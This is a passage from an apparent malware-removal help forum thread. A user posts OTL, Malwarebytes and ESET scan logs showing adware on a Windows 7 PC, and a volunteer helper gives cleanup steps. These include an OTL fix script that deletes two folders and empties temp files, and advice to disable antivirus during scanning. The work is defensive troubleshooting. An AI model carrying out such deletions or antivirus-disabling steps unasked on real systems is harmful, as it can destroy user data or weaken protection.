O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{EAEDBEA4-03ED-4E5F-BF50-FFDB1C264342}: DhcpNameServer = 75.75.75.75 75.75.76.76
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~3\WebPlat\WEBPLA~1.DLL) - C:\ProgramData\WebPlat\WebPlat_x64.dll ()
O20 - AppInit_DLLs: (c:\progra~3\webplat\webplat.dll) - c:\ProgramData\WebPlat\WebPlat.dll ()
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/05/05 09:36:45 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/01/04 04:00:31 | 000,000,000 | ---D | C] -- C:\_OTL
[2014/01/03 16:07:24 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/01/03 16:06:23 | 001,036,305 | ---- | C] (Thisisu) -- C:\Users\Wesley\Desktop\JRT.exe
[2014/01/03 15:50:07 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/01/03 15:24:05 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\SPReview
[2014/01/03 15:23:40 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\EventProviders
[2014/01/03 15:20:31 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\MRT
[2014/01/03 14:57:54 | 002,622,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wucltux.dll
[2014/01/03 14:57:54 | 000,057,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuauclt.exe
[2014/01/03 14:57:54 | 000,044,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wups2.dll
[2014/01/03 14:57:17 | 000,701,976 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuapi.dll
[2014/01/03 14:57:17 | 000,099,840 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wudriver.dll
[2014/01/03 14:57:17 | 000,038,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wups.dll
[2014/01/03 14:56:39 | 000,186,752 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuwebv.dll
[2014/01/03 14:56:39 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuapp.exe
[2014/01/03 07:49:25 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2014/01/02 23:21:38 | 004,745,728 | ---- | C] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2014/01/02 07:58:28 | 000,388,608 | ---- | C] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/12/31 23:48:39 | 000,000,000 | ---D | C] -- C:\ProgramData\DeAlEoxipRRESs
[2013/12/31 23:48:34 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\Packages
[2013/12/31 23:48:34 | 000,000,000 | ---D | C] -- C:\ProgramData\3bbeb3a6f04741f7
[2013/12/31 23:48:33 | 000,000,000 | ---D | C] -- C:\ProgramData\FuanDEals
[2013/12/29 13:43:57 | 000,000,000 | ---D | C] -- C:\Users\Wesley\.android
[2013/12/29 13:43:55 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Roaming\newnext.me
[2013/12/29 13:43:55 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\cache
[2013/12/29 13:43:53 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\genienext
[2013/12/28 08:37:50 | 000,000,000 | ---D | C] -- C:\ProgramData\WebPlat
[2013/12/27 11:21:56 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\TGitCache
[2013/12/27 11:20:16 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\src
[2013/12/27 11:20:16 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\bin
[2013/12/27 11:13:12 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\FlashDevelop
[2013/12/27 11:11:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Git
[2013/12/27 11:10:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Git
[2013/12/27 11:08:22 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Desktop\SkyUI_stuff
[2013/12/27 11:05:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TortoiseGit
[2013/12/27 11:05:21 | 000,000,000 | ---D | C] -- C:\Program Files\TortoiseGit
[2013/12/27 11:01:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashDevelop
[2013/12/27 11:00:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\FlashDevelop
[2013/12/12 12:04:39 | 000,000,000 | ---D | C] -- C:\ProgramData\BioWare
[2013/12/12 12:00:12 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\BioWare
[2013/12/11 08:19:50 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2013/12/09 15:39:05 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\NCSOFT
[2013/12/09 15:38:41 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCWest
[2013/12/09 15:38:41 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\NCWest
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/01/04 04:14:18 | 000,026,512 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/01/04 04:14:18 | 000,026,512 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/01/04 04:11:37 | 000,877,058 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/01/04 04:11:37 | 000,729,420 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/01/04 04:11:37 | 000,147,176 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/01/04 04:06:02 | 000,025,640 | ---- | M] (Windows ® Server 2003 DDK provider) -- C:\Windows\gdrv.sys
[2014/01/04 04:05:59 | 000,000,376 | -H-- | M] () -- C:\Windows\tasks\MagniPicUpdaterTask{1808030E-38EA-43D5-A427-B34BA55CD23C}.job
[2014/01/04 04:05:51 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/01/04 04:05:45 | 3206,471,680 | -HS- | M] () -- C:\hiberfil.sys
[2014/01/04 03:17:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/01/03 16:06:27 | 001,036,305 | ---- | M] (Thisisu) -- C:\Users\Wesley\Desktop\JRT.exe
[2014/01/03 15:49:26 | 001,233,962 | ---- | M] () -- C:\Users\Wesley\Desktop\AdwCleaner.exe
[2014/01/03 15:40:42 | 002,219,728 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/01/03 15:30:50 | 000,175,616 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\msclmd.dll
[2014/01/03 15:30:50 | 000,152,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\msclmd.dll
[2014/01/03 07:49:28 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2014/01/03 07:47:22 | 000,000,559 | ---- | M] () -- C:\Users\Wesley\Desktop\MBR.zip
[2014/01/03 07:45:59 | 000,000,512 | ---- | M] () -- C:\Users\Wesley\Desktop\MBR.dat
[2014/01/02 23:21:44 | 004,745,728 | ---- | M] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2014/01/02 23:08:40 | 000,987,410 | ---- | M] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
[2014/01/02 13:07:15 | 000,020,749 | ---- | M] () -- C:\Users\Wesley\Documents\Public_Executions_Tutorial.odt
[2014/01/02 07:58:31 | 000,388,608 | ---- | M] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/12/27 11:50:54 | 000,000,090 | ---- | M] () -- C:\Users\Wesley\mm.cfg
[2013/12/27 11:42:57 | 000,692,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2013/12/27 11:42:57 | 000,071,048 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2013/12/27 11:22:21 | 000,002,010 | ---- | M] () -- C:\Users\Wesley\Documents\SelectedItemMonitor.as2proj
[2013/12/27 06:34:31 | 000,005,756 | ---- | M] () -- C:\Users\Wesley\Documents\Database.kdb
[2013/12/26 08:48:29 | 000,294,402 | ---- | M] () -- C:\Users\Wesley\Desktop\ScreenShot472.jpg
[2013/12/26 08:48:19 | 000,285,855 | ---- | M] () -- C:\Users\Wesley\Desktop\ScreenShot471.jpg
[2013/12/25 11:09:45 | 000,014,582 | ---- | M] () -- C:\Users\Wesley\Desktop\animationtest.nif
[2013/12/25 11:09:45 | 000,000,118 | ---- | M] () -- C:\Users\Wesley\Desktop\animationtest.kf
[2013/12/25 08:14:22 | 000,008,878 | ---- | M] () -- C:\Users\Wesley\Desktop\watertestorb.nif
[2013/12/25 08:11:59 | 000,006,192 | ---- | M] () -- C:\Users\Wesley\AppData\Local\recently-used.xbel
[2013/12/17 18:42:54 | 000,007,624 | ---- | M] () -- C:\Users\Wesley\AppData\Local\Resmon.ResmonCfg
[2013/12/15 09:48:05 | 000,000,890 | ---- | M] () -- C:\Users\Public\Desktop\Nexus Mod Manager.lnk
[2013/12/13 12:49:17 | 000,000,023 | ---- | M] () -- C:\Windows\BlendSettings.ini
[2013/12/13 09:27:20 | 000,000,221 | ---- | M] () -- C:\Users\Wesley\Desktop\The Elder Scrolls IV Oblivion.url
[2013/12/12 17:34:53 | 000,000,641 | ---- | M] () -- C:\Users\Wesley\Documents\HT_todoList.rtf
[2013/12/12 10:51:15 | 000,000,221 | ---- | M] () -- C:\Users\Wesley\Desktop\Dragon Age Origins - Ultimate Edition.url
[2013/12/12 09:43:58 | 000,002,655 | ---- | M] () -- C:\Users\Wesley\Documents\Allowed_List.rtf
[2013/12/11 11:52:10 | 000,002,048 | ---- | M] () -- C:\Users\Wesley\Application Data\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk
[2013/12/09 15:39:05 | 000,002,248 | ---- | M] () -- C:\Users\Public\Desktop\Lineage II.lnk
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/01/03 15:49:21 | 001,233,962 | ---- | C] () -- C:\Users\Wesley\Desktop\AdwCleaner.exe
[2014/01/03 07:47:22 | 000,000,559 | ---- | C] () -- C:\Users\Wesley\Desktop\MBR.zip
[2014/01/03 07:45:59 | 000,000,512 | ---- | C] () -- C:\Users\Wesley\Desktop\MBR.dat
[2014/01/02 23:08:36 | 000,987,410 | ---- | C] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
[2014/01/02 13:07:13 | 000,020,749 | ---- | C] () -- C:\Users\Wesley\Documents\Public_Executions_Tutorial.odt
[2013/12/27 11:20:16 | 000,002,010 | ---- | C] () -- C:\Users\Wesley\Documents\SelectedItemMonitor.as2proj
[2013/12/27 11:13:14 | 000,000,090 | ---- | C] () -- C:\Users\Wesley\mm.cfg
[2013/12/26 08:48:29 | 000,294,402 | ---- | C] () -- C:\Users\Wesley\Desktop\ScreenShot472.jpg
[2013/12/26 08:48:19 | 000,285,855 | ---- | C] () -- C:\Users\Wesley\Desktop\ScreenShot471.jpg
[2013/12/25 11:09:45 | 000,000,118 | ---- | C] () -- C:\Users\Wesley\Desktop\animationtest.kf
[2013/12/25 08:14:22 | 000,008,878 | ---- | C] () -- C:\Users\Wesley\Desktop\watertestorb.nif
[2013/12/25 08:11:59 | 000,006,192 | ---- | C] () -- C:\Users\Wesley\AppData\Local\recently-used.xbel
[2013/12/25 06:19:47 | 000,014,582 | ---- | C] () -- C:\Users\Wesley\Desktop\animationtest.nif
[2013/12/13 09:27:20 | 000,000,221 | ---- | C] () -- C:\Users\Wesley\Desktop\The Elder Scrolls IV Oblivion.url
[2013/12/12 10:51:15 | 000,000,221 | ---- | C] () -- C:\Users\Wesley\Desktop\Dragon Age Origins - Ultimate Edition.url
[2013/12/11 13:35:46 | 000,000,641 | ---- | C] () -- C:\Users\Wesley\Documents\HT_todoList.rtf
[2013/12/11 13:27:41 | 000,002,655 | ---- | C] () -- C:\Users\Wesley\Documents\Allowed_List.rtf
[2013/12/09 15:39:05 | 000,002,248 | ---- | C] () -- C:\Users\Public\Desktop\Lineage II.lnk
[2013/08/09 12:11:40 | 000,000,089 | ---- | C] () -- C:\Users\Wesley\.gtk-bookmarks
[2013/03/08 08:41:00 | 000,000,600 | ---- | C] () -- C:\Users\Wesley\AppData\Local\PUTTY.RND
[2012/11/07 10:42:16 | 000,444,283 | ---- | C] () -- C:\Program Files\Common Files\WinPcapNmap.exe
[2012/03/31 01:16:37 | 000,000,600 | ---- | C] () -- C:\Users\Wesley\AppData\Roaming\winscp.rnd
[2012/01/13 11:50:02 | 000,151,552 | ---- | C] () -- C:\Windows\SysWow64\nvRegDev.dll
[2011/10/29 09:30:13 | 000,030,720 | ---- | C] () -- C:\Users\Wesley\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/07/08 06:43:10 | 000,009,707 | ---- | C] () -- C:\Users\Wesley\AppData\Roaming\C186.2A3
[2011/01/01 04:02:54 | 000,007,624 | ---- | C] () -- C:\Users\Wesley\AppData\Local\Resmon.ResmonCfg
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2010/11/20 08:27:25 | 014,174,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2010/11/20 07:21:19 | 012,872,192 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 07:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== Files - Unicode (All) ==========
[2011/11/21 07:48:07 | 000,000,650 | ---- | M] ()(C:\Users\Wesley\AppData\Local\PMB Fik?s) -- C:\Users\Wesley\AppData\Local\PMB Fik聥s
[2011/11/21 07:48:07 | 000,000,650 | ---- | C] ()(C:\Users\Wesley\AppData\Local\PMB Fik?s) -- C:\Users\Wesley\AppData\Local\PMB Fik聥s

< End of report >
 

 

Performance has improved. It didn't take firefox minutes to load, and things didn't seem as if they were in a long waiting line.

 

 



#8 OCD

OCD

    SuperHelper

  • Malware Team
  • 5,574 posts

Posted 04 January 2014 - 09:29 AM

Hi Midnight Sky,

Can you tell me anything about these two (2) folders:
C:\ProgramData\DeAlEoxipRRESs
C:\ProgramData\FuanDEals


=========================

bullseye_zpse9eaf36e.gif Malwarebytes' Anti-Malware

Download Malwarebytes' Anti-Malware (save it to your desktop).

    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Once the program has loaded, select the Update tab to get the latest updates before performing the scan.
  • Select Perform quick scan, then click Scan.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is checked, and click Remove Selected .
  • When completed, a log will open in Notepad. Please save it to a convenient location and post the results.
  • Note: If you receive a notice that some of the items couldn't be removed, that they have been added to the delete on reboot list, please reboot.

=========================

bullseye_zpse9eaf36e.gif ESET Online Scanner

*Note:

  • It is recommended to disable on-board antivirus program and anti-spyware programs while performing scans so there are no conflicts and it will speed up scan time.
  • Please don't go surfing while your resident protection is disabled!
  • Once the scan is finished remember to re-enable your antivirus along with your anti-spyware programs.

** You need to run your browser with Administrator Rights, to do so right click your browsers short cut and select "Run as Administrator".

= = = = = = = = = = = = = = = = = = = =

Go here to run ESET Online Scanner

(Note: You can use Internet Explorer or FireFox for this scan. If you use FireFox you will be asked to install an additional component. Please allow this.)

  • Tick the box next to YES, I accept the Terms of Use.
  • Click Start
  • When asked, allow the activex control to install
  • Disable your Antivirus software. You can usually do this with its Notification Tray icon near the clock
  • Click Start
  • Make sure that the option "Remove found threats" is Unchecked, and the option "Scan unwanted applications" is Checked.
  • Click Scan.
  • Wait for the scan to finish.
  • When the scan completes, click List of found threats
  • click Export to Text file and save the file to your desktop using a unique name, such as ESETScan.
  • Include the contents of this report in your next reply

    Note - when ESET doesn't find any threats, no report will be created.
  • Push the back button.
  • Push Finish
  • Re-enable your Antivirus software.

=========================

In your next post please provide the following:

  • MBAM log
  • ESET's log.txt
  • How's the computer running, any symptoms?

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days








If you are satisfied with the help you have received, please consider making a donation.


#9 Midnight Sky

Midnight Sky

    New Member

  • Authentic Member
  • Pip
  • 9 posts

Posted 06 January 2014 - 12:19 PM

Those 2 folders, I don't know what they are or where they came from.

 

Currently, my Internet is down at my home and has been since saturday morning. I don't know when it'll get back up(supposedly today but my ISP is Comcast..so when ever they feel like it :/ ). The only means of using the net right now is through the library. If possible we can continue this when I get my service back? Thanks for your time and help.



#10 OCD

OCD

    SuperHelper

  • Malware Team
  • 5,574 posts

Posted 06 January 2014 - 12:39 PM

Hi Midnight Sky,
 

 

The only means of using the net right now is through the library. If possible we can continue this when I get my service back?

 

 

That is not a problem. Just post back when you are back online and we will continue then.


OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days








If you are satisfied with the help you have received, please consider making a donation.

    Advertisements

Register to Remove


#11 OCD

OCD

    SuperHelper

  • Malware Team
  • 5,574 posts

Posted 10 January 2014 - 09:33 AM

Hi Midnight Sky,

 

Any luck getting your Internet Service up and running so we can continue?


OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days








If you are satisfied with the help you have received, please consider making a donation.


#12 Midnight Sky

Midnight Sky

    New Member

  • Authentic Member
  • Pip
  • 9 posts

Posted 12 January 2014 - 08:02 AM

Sorry about that. They came yesterday. Everything is working now.

 

Ok here's the logs:

 

Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Database version: v2014.01.12.04

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 9.0.8112.16421
Wesley :: VERONICA [administrator]

1/12/2014 8:02:52 AM
MBAM-log-2014-01-12 (08-09-49).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 220043
Time elapsed: 4 minute(s), 19 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 1
HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252} (PUP.Optional.GreatSaver.A) -> No action taken.

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 2
C:\Users\Wesley\AppData\Roaming\newnext.me (PUP.Optional.NextLive.A) -> No action taken.
C:\Users\Wesley\AppData\Roaming\newnext.me\cache (PUP.Optional.NextLive.A) -> No action taken.

Files Detected: 3
C:\Users\Wesley\AppData\Roaming\newnext.me\nengine.cookie (PUP.Optional.NextLive.A) -> No action taken.
C:\Users\Wesley\AppData\Roaming\newnext.me\nengine.dll (PUP.Optional.NextLive.A) -> No action taken.
C:\Users\Wesley\AppData\Roaming\newnext.me\cache\spark.bin (PUP.Optional.NextLive.A) -> No action taken.

(end)
 

 

ESETScan

 

C:\AdwCleaner\Quarantine\C\Program Files (x86)\Industriya\privitize\1.8.16.22\escortShld.dll.vir    Win32/Toolbar.Funmoods application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\Industriya\privitize\1.8.16.22\privitizeApp.dll.vir    a variant of Win32/Toolbar.Montiera.A application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\Industriya\privitize\1.8.16.22\privitizeEng.dll.vir    probably a variant of Win32/Toolbar.Montiera.A application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\Industriya\privitize\1.8.16.22\privitizesrv.exe.vir    a variant of Win32/Toolbar.Montiera.A application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\Industriya\privitize\1.8.16.22\bh\privitize.dll.vir    a variant of Win32/Toolbar.Escort.A application
C:\AdwCleaner\Quarantine\C\ProgramData\Premium\MagniPic\runA223.tmp.vir    Win32/GenUpdater application
C:\AdwCleaner\Quarantine\C\ProgramData\Premium\MagniPic\runE988.tmp.vir    Win32/GenUpdater application
C:\AdwCleaner\Quarantine\C\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\ieffnjekemefjhjdaialbngjcpmgopna\1\515c30e30fb478.38099456.js.vir    Win32/Adware.MultiPlug.H application
 

 

The system is running much better than before, and it's not "queuing" stuff or taking long time to load firefox.



#13 OCD

OCD

    SuperHelper

  • Malware Team
  • 5,574 posts

Posted 12 January 2014 - 09:23 AM

Hi Midnight Sky,

The ESET items are in a quarantine folder and will be removed when we clean up at the end of the process so there is no need to worry about those items.

bullseye_zpse9eaf36e.gif Malwarebytes' Anti-Malware

Locate Malwarebytes' Anti-Malware (it should be on your desktop).
If not, download it here
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Once the program has loaded, select the Update tab to get the latest updates before performing the scan.
  • Select Perform quick scan, then click Scan.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is checked, and click Remove Selected .
  • When completed, a log will open in Notepad. Please save it to a convenient location and post the results.
  • Note: If you receive a notice that some of the items couldn't be removed, that they have been added to the delete on reboot list, please reboot.
=========================

bullseye_zpse9eaf36e.gif Run OTL.exe
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Copy/paste the following text written inside of the code box into the Custom Scans/Fixes box located at the bottom of OTL

    :Files
    C:\ProgramData\DeAlEoxipRRESs
    C:\ProgramData\FuanDEals
    
    :Commands
    [purity]
    [createrestorepoint]
    [emptytemp]
    [Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot when it is done
  • Then re-run OTL and post a new OTL log ( don't check the boxes beside LOP Check or Purity this time )
=========================

In your next post please provide the following:
  • MBAM log
  • Fresh OTL.txt
  • Any remaining issues?

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days








If you are satisfied with the help you have received, please consider making a donation.


#14 Midnight Sky

Midnight Sky

    New Member

  • Authentic Member
  • Pip
  • 9 posts

Posted 13 January 2014 - 04:54 AM

Still being a lot more stable and down from the usual 80 something processes, to about 60-65.

 

 

 

Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Database version: v2014.01.12.04

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 9.0.8112.16421
Wesley :: VERONICA [administrator]

1/13/2014 5:24:07 AM
mbam-log-2014-01-13 (05-24-07).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 221741
Time elapsed: 5 minute(s), 7 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)
 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

OTL logfile created on: 1/13/2014 5:39:07 AM - Run 5
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Wesley\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.98 Gb Total Physical Memory | 2.71 Gb Available Physical Memory | 68.17% Memory free
7.96 Gb Paging File | 6.64 Gb Available in Paging File | 83.46% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 343.68 Gb Free Space | 36.90% Space Free | Partition Type: NTFS
Drive D: | 7.07 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: UDF
Drive H: | 1863.01 Gb Total Space | 6.14 Gb Free Space | 0.33% Space Free | Partition Type: NTFS
Drive M: | 1863.01 Gb Total Space | 14.07 Gb Free Space | 0.76% Space Free | Partition Type: NTFS
 
Computer Name: VERONICA | User Name: Wesley | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Users\Wesley\Desktop\OTL(1).exe (OldTimer Tools)
PRC - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation)
PRC - C:\Windows\SysWOW64\vmnetdhcp.exe (VMware, Inc.)
PRC - C:\Windows\SysWOW64\vmnat.exe (VMware, Inc.)
PRC - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe (Microsoft Corporation)
PRC - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe (Microsoft Corporation)
PRC - C:\Program Files\Autodesk\3ds Max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe ()
